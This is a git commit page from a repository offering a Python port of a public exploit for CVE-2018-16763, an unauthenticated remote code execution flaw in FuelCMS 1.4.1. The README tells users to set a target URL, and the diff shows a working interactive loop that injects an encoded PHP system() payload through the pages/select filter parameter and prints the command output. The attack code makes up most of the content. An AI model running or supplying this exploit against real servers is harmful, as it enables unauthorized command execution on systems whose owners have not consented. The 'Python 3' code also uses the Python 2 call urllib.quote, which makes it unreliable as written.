n3m1sys/CVE-2018-16763-Exploit-Python3
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Another Commit

Browse Source
This commit is contained in:
Martín Romera Sobrado
2020-10-10 22:29:17 +02:00
parent 43da7331c6
commit 3f2dffd788
2 changed files with 10 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
README.md Normal file
View File

@@ -0,0 +1,9 @@
# CVE-2018-16763
## FuelCMS 1.4.1 Remote Code Execution Vulnerability
This is a port to Python 3 of the vulnerability at https://www.exploit-db.com/exploits/47138, created by 0xd0ff9.
To run de exploit, just modify the *url* variable in the code with the target url you want to attack, and add the proxies you are behind to the *proxies* list.
This exploit doesn't require any kind of authentication.

2
exploit.py
View File

@@ -18,11 +18,11 @@ import requests
import urllib import urllib
url = "http://x.x.x.x:port" # Change this to the target URL url = "http://x.x.x.x:port" # Change this to the target URL
proxy = {"http" : "http://127.0.0.1:8080"} # Proxies you are behind (example is a burp url)
while 1: while 1:
command = input("$: ") command = input("$: ")
exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27" exploit_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(command)+"%27%29%2b%27"
proxy = {"http" : "http://127.0.0.1:8080"} # List of the proxies you are behind
r = requests.get(exploit_url, proxies=proxy) r = requests.get(exploit_url, proxies=proxy)
print(r.text[r.text.find("system")+6:r.text.find("<div ")]) print(r.text[r.text.find("system")+6:r.text.find("<div ")])